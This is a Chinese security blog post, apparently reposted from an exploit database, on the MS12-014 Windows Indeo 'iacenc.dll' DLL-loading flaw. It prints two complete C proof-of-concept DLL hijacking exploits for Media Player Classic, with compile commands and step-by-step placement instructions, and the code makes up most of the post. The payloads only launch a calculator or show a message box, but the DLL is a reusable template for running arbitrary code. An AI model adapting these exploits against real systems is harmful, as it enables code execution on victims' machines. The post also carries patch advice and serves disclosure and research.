注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

Microsoft Windows Indeo Filter 'iacenc.dll' DLL加载任意代码执行漏洞(MS12-014)  

2012-02-16 19:07:42|  分类: 0day漏洞 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
SSV-ID: 30119
SSV-AppDir: Microsoft Windows
发布时间: 2012-02-14

漏洞版本:

Microsoft Windows Vista Microsoft Windows Server 2008 Microsoft Windows 7

漏洞描述:

BUGTRAQ  ID: 42730  Microsoft Windows是流行的计算机操作系统。  Windows的iac25_32.ax过滤器在处理DLL文件的加载上存在漏洞,攻击者可利用此漏洞使用户从不安全的目录加载DLL文件并执行任意代码。

测试方法:

@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
  1. /*
  2. Mediaplayer Classic 1.3.2189.0 Dll Hijack Exploit
  3. By: Encrypt3d.M!nd
  4. Date: 25\8\2010
  5. Download: http://mpc-hc.sourceforge.net/
  6.  
  7. Details:
  8. Compile the following code and rename it to iacenc.dll
  9. and place file with one of the affected types in the same directory of the dll
  10.  
  11. Affected types: m2ts, m2t, flv, hdmov, 3gpp,3gp, mpeg, mp4v, mkv, m2v,rm , ram
  12. (i guess all file types that mpc supports are affected)
  13.  
  14. Code :(used the one from this advisory:http://www.exploit-db.com/exploits/14758/):
  15. */
  16.  
  17. #include <windows.h>
  18. #define DLLIMPORT __declspec (dllexport)
  19.  
  20. DLLIMPORT void hook_startup() { evil(); }
  21.  
  22. int evil()
  23. {
  24. WinExec("calc", 0);
  25. exit(0);
  26. return 0;
  27. }
  28.  
  29.  
  30.  
  31. /*
  32.  
  33. Media Player Classic 6.4.9.1 (iacenc.dll) DLL Hijacking Exploit
  34.  
  35. Vendor: Gabest
  36. Product Web Page: http://sourceforge.net/projects/guliverkli
  37. Affected Version: 6.4.9.1 (revision 73)
  38.  
  39. Summary: Media Player Classic (MPC) is a compact media player for
  40. 32-bit Microsoft Windows. The application mimics the look and feel
  41. of the old, lightweight Windows Media Player 6.4 but integrates
  42. most options and features found in modern media players. It and
  43. its forks are standard media players in the K-Lite Codec Pack and
  44. the Combined Community Codec Pack.
  45.  
  46. Desc: Media Player Classic suffers from a dll hijacking vulnerability
  47. that enables the attacker to execute arbitrary code on a local
  48. level. The vulnerable extensions are .mka, .ra and .ram thru iacenc.dll
  49. library.
  50.  
  51. ----
  52. gcc -shared -o iacenc.dll mplayerc.c
  53.  
  54. Compile and rename to iacenc.dll, create a file test.mka or any of the
  55. above vulnerable extensions and put both files in same dir and execute.
  56. ----
  57.  
  58. Tested on Microsoft Windows XP Professional SP3 (EN)
  59.  
  60.  
  61.  
  62. Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  63. liquidworm gmail com
  64.  
  65. Zero Science Lab - http://www.zeroscience.mk
  66.  
  67.  
  68. 25.08.2010
  69.  
  70. */
  71.  
  72.  
  73. #include <windows.h>
  74.  
  75. BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
  76. {
  77.  
  78. switch (fdwReason)
  79. {
  80. case DLL_PROCESS_ATTACH:
  81. dll_mll();
  82. case DLL_THREAD_ATTACH:
  83. case DLL_THREAD_DETACH:
  84. case DLL_PROCESS_DETACH:
  85. break;
  86. }
  87.  
  88. return TRUE;
  89. }
  90.  
  91. int dll_mll()
  92. {
  93. MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
  94. }

安全建议:

厂商补丁:  Microsoft --------- Microsoft已经为此发布了一个安全公告(MS12-014)以及相应补丁:  MS12-014:Vulnerability in the Indeo Codec Could Allow Remote Code Execution (2661637)  链接:http://www.microsoft.com/technet/security/bulletin/MS12-014.asp
@Sebug.net [ 2012-02-16 ]
  评论这张
 
阅读(1022)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016